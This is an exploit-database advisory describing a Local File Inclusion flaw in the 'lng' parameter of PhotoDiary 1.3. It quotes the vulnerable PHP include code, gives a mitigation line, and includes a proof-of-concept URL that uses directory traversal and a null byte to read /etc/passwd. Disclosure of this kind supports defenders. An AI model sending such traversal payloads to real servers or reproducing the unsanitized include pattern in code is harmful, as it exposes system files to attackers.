header-logo
Suggest Exploit
vendor:
PhotoDiary
by:
cOndemned
8.8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: PhotoDiary
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: No
Related CWE: N/A
CPE: photodiary:photodiary
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability

PhotoDiary 1.3 is vulnerable to a Local File Inclusion vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious 'lng' parameter. This parameter is used to include a file from the web server's file system. By manipulating the 'lng' parameter, an attacker can include arbitrary files from the web server's file system.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used to include files.
Source

Exploit-DB raw data:

PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability
Discovered by cOndemned

download: http://code.google.com/p/photodiary/


source of /admin/install.php (lines 9 - 15):

	if (isset($_GET['lng'])){
		$LNG = $_GET['lng'];			# 1
	} else {
		$LNG = "ITA";
	}
	
	include "../common/language_".$LNG.".php";	# 2


proof of concept:
		
	http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00